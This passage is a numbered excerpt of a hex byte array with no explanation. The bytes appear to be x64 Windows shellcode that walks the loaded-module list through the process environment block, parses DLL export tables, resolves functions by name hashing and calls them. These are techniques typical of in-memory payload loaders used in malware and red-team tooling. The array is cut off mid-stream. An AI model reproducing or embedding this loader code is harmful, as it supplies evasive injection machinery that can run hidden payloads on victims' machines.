195 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00,
196 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x03,
197 0x74, 0x0e, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83,
198 0xf8, 0x04, 0x75, 0x1b, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48,
199 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xf5, 0x24,
200 0x00, 0x00, 0xe9, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
201 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0e, 0x48, 0x8b, 0x85,
202 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x5c, 0x48,
203 0x8d, 0x95, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
204 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
205 0x00, 0x00, 0xe8, 0x87, 0x15, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x20, 0x48,
206 0x8d, 0x95, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
207 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
208 0x00, 0x00, 0xe8, 0xe8, 0x1a, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xe0, 0x00,
209 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
210 0xe8, 0x5d, 0x22, 0x00, 0x00, 0xeb, 0x50, 0x48, 0x8b, 0x85, 0x80, 0x01,
211 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0e, 0x48, 0x8b, 0x85,
212 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x33, 0x48,
213 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
214 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xc3, 0x40, 0x00, 0x00, 0xeb, 0x1c, 0x90,
215 0xeb, 0x19, 0x90, 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90,
216 0xeb, 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90,
217 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80,
218 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x74, 0x16, 0x48, 0x8b, 0x85,
219 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8,
220 0x03, 0x0f, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
221 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x85, 0xc0,
222 0x74, 0x7d, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
223 0x28, 0x0d, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
224 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x41, 0x89, 0xd0, 0xba,
225 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x34, 0x5a, 0x00, 0x00,
226 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0,
227 0x01, 0x00, 0x00, 0x48, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x4d,
228 0xc8, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
229 0x20, 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89,
230 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x7e, 0x62, 0x00,
231 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x30,
232 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
233 0x00, 0x00, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f,
234 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
235 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x41, 0x89, 0xc0, 0xba,
236 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8,
237 0xac, 0x59, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
238 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x85,
239 0x58, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00,
240 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00,
241 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
242 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xbd, 0x28, 0x01,
243 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00,
244 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
245 0x48, 0x81, 0xc4, 0x10, 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
246 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
247 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
248 0x60, 0x48, 0x8b, 0x4d, 0x18, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00,
249 0x00, 0x48, 0x8b, 0x55, 0x20, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
250 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
251 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x83, 0xc4, 0x30, 0x5d,
252 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x60, 0x48, 0x89, 0x4d,
253 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d,
254 0x28, 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xcc,
255 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x65, 0x48, 0x8b, 0x00, 0x48,
256 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xc0, 0x48, 0x8b, 0x40, 0x60, 0x48,
257 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x18, 0x48,
258 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x10, 0x48,
259 0x89, 0x45, 0xf8, 0xeb, 0x45, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
260 0x30, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x3b, 0x45,
261 0x18, 0x74, 0x23, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x45, 0xd8, 0x41,
262 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48,
263 0x8b, 0x4d, 0x10, 0xe8, 0x76, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0,
264 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89,
265 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85,
266 0xc0, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xa7, 0x48, 0x83,
267 0x7d, 0xf0, 0x00, 0x75, 0x3f, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0xc2,
268 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x3d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x45,
269 0xd0, 0x48, 0x83, 0x7d, 0xd0, 0x00, 0x74, 0x1c, 0x48, 0x8b, 0x45, 0x10,
270 0x4c, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x45, 0xd0,
271 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x08,
272 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
273 0x48, 0x83, 0xc4, 0x60, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x01,
274 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
275 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0x98, 0x00, 0x00, 0x00,
276 0x4c, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x44, 0x89, 0x8d, 0xa8, 0x00,
277 0x00, 0x00, 0x48, 0xc7, 0x45, 0x78, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83,
278 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
279 0x00, 0xe9, 0xb3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00,
280 0x00, 0x48, 0x89, 0x45, 0x68, 0x48, 0x8b, 0x45, 0x68, 0x8b, 0x40, 0x3c,
281 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01,
282 0xd0, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0x48, 0x05, 0x88,
283 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x58, 0x48, 0x8b, 0x45, 0x58, 0x8b,
284 0x00, 0x89, 0x45, 0x54, 0x83, 0x7d, 0x54, 0x00, 0x75, 0x0a, 0xb8, 0x00,
285 0x00, 0x00, 0x00, 0xe9, 0x69, 0x02, 0x00, 0x00, 0x8b, 0x55, 0x54, 0x48,
286 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45,
287 0x48, 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b,
288 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x40,
289 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85,
290 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x38, 0x48,
291 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98,
292 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x30, 0x48, 0x83,
293 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00,
294 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x18, 0x89, 0x45, 0x74, 0x83, 0x7d,
295 0x74, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xeb, 0x01,
296 0x00, 0x00, 0x8b, 0x45, 0x74, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
297 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x01,
298 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00,
299 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x28, 0x48, 0x8b, 0x95, 0xa0, 0x00,
300 0x00, 0x00, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0xc1, 0xe8, 0x62, 0x58,
301 0x00, 0x00, 0x85, 0xc0, 0x75, 0x3a, 0x8b, 0x45, 0x74, 0x83, 0xe8, 0x01,
302 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x01,
303 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
304 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x40, 0x48, 0x01, 0xd0, 0x8b, 0x00,
305 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0,
306 0x48, 0x89, 0x45, 0x78, 0x83, 0x6d, 0x74, 0x01, 0x83, 0x7d, 0x74, 0x00,
307 0x74, 0x3f, 0x48, 0x83, 0x7d, 0x78, 0x00, 0x0f, 0x84, 0x71, 0xff, 0xff,
308 0xff, 0xeb, 0x32, 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x50, 0x10, 0x8b, 0x85,
309 0xa8, 0x00, 0x00, 0x00, 0x29, 0xd0, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85,
310 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x40, 0x48, 0x01, 0xd0, 0x8b,
311 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01,
312 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x3b, 0x45,
313 0x48, 0x0f, 0x82, 0x16, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x58, 0x8b,
314 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x48, 0x48, 0x01, 0xd0, 0x48,
315 0x39, 0x45, 0x78, 0x0f, 0x83, 0xfc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
316 0x78, 0x48, 0x89, 0x45, 0x20, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00,
317 0xeb, 0x29, 0x8b, 0x55, 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0,
318 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x70, 0x88, 0x54, 0x05, 0xe0, 0x8b, 0x55,
319 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c,
320 0x2e, 0x74, 0x1d, 0x83, 0x45, 0x70, 0x01, 0x8b, 0x55, 0x70, 0x48, 0x8b,
321 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x09,
322 0x83, 0x7d, 0x70, 0x3b, 0x76, 0xc0, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0x70,
323 0x83, 0xc0, 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x64, 0x8b, 0x45,
324 0x70, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x6c, 0x8b,
325 0x45, 0x70, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x6c,
326 0x8b, 0x45, 0x70, 0x83, 0xc0, 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0,
327 0x00, 0x8b, 0x45, 0x70, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x45,
328 0x20, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18, 0x8b, 0x55,
329 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b,
330 0x45, 0x70, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x45, 0x70, 0x01, 0x8b, 0x55,
331 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
332 0xc0, 0x74, 0x06, 0x83, 0x7d, 0x70, 0x3e, 0x76, 0xd1, 0x8b, 0x45, 0x70,
333 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8d, 0x4d, 0xa0, 0x48, 0x8d, 0x55,
334 0xe0, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49,
335 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x90, 0x00, 0x00, 0x00,
336 0xe8, 0x0c, 0xfc, 0xff, 0xff, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8b, 0x45,
337 0x78, 0x48, 0x81, 0xc4, 0x00, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48,
338 0x89, 0xe5, 0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x4d,
339 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00,
340 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1b, 0x8b, 0x55,
341 0xec, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b,
342 0x45, 0xec, 0x88, 0x94, 0x05, 0x50, 0xff, 0xff, 0xff, 0x83, 0x45, 0xec,
343 0x01, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x01, 0xd0, 0x0f,
344 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xec, 0x3f, 0x76, 0xce,
345 0x8b, 0x45, 0xec, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x00, 0x8b,
346 0x45, 0xec, 0x83, 0xe8, 0x04, 0x89, 0xc0, 0x0f, 0xb6, 0x84, 0x05, 0x50,
347 0xff, 0xff, 0xff, 0x3c, 0x2e, 0x74, 0x5f, 0x8b, 0x45, 0xec, 0x8d, 0x50,
348 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff,
349 0xff, 0x2e, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89,
350 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x64, 0x8b, 0x45, 0xec,
351 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50,
352 0xff, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55,
353 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x6c, 0x8b,
354 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84,
355 0x05, 0x50, 0xff, 0xff, 0xff, 0x00, 0xc7, 0x45, 0xa4, 0x30, 0x00, 0x00,
356 0x00, 0x8b, 0x45, 0xa4, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0x98,
357 0x48, 0x8b, 0x45, 0x98, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x89, 0x45, 0xe0,
358 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xd8,
359 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8,
360 0xe9, 0x8b, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
361 0x30, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45,
362 0xc8, 0x48, 0x8b, 0x45, 0xc8, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48,
363 0x8b, 0x45, 0xd0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b,
364 0x45, 0xc0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x45, 0xbc, 0x83,
365 0x7d, 0xbc, 0x00, 0x74, 0x43, 0x8b, 0x55, 0xbc, 0x48, 0x8b, 0x45, 0xd0,
366 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xb0, 0x48, 0x8b, 0x45, 0xb0, 0x8b,
367 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x01, 0xd0, 0x48,
368 0x89, 0x45, 0xa8, 0x48, 0x8b, 0x55, 0xa8, 0x48, 0x8d, 0x85, 0x50, 0xff,
369 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x87, 0x55, 0x00, 0x00, 0x85, 0xc0,
370 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x01,
371 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8,
372 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
373 0x0b, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x5d, 0xff, 0xff, 0xff,
374 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48,
375 0x8b, 0x50, 0x30, 0x48, 0x8d, 0x85, 0x50, 0xff, 0xff, 0xff, 0x48, 0x89,
376 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf0, 0x48,
377 0x81, 0xc4, 0xd0, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec,
378 0x60, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
379 0x48, 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01,
380 0x00, 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d,
381 0x08, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00,
382 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89,
383 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
384 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
385 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48,
386 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00,
387 0x48, 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01,
388 0x00, 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd,
389 0xb4, 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
390 0xe9, 0x76, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48,
391 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
392 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b,
393 0x40, 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01,
394 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x3c,
395 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
396 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01,
397 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8,
398 0x01, 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8,
399 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00,
400 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89,
401 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
402 0x89, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00,
403 0x00, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
404 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7,
405 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b,
406 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00,
407 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b,
408 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc,
409 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b,
410 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
411 0xc0, 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05,
412 0x60, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45,
413 0x60, 0x48, 0x89, 0xc1, 0xe8, 0x94, 0x5b, 0x00, 0x00, 0x48, 0x89, 0x85,
414 0x80, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8,
415 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
416 0x8b, 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89,
417 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
418 0x89, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00,
419 0x00, 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
420 0x45, 0x5b, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48,
421 0x39, 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xd6, 0x01, 0x00, 0x00,
422 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
423 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01,
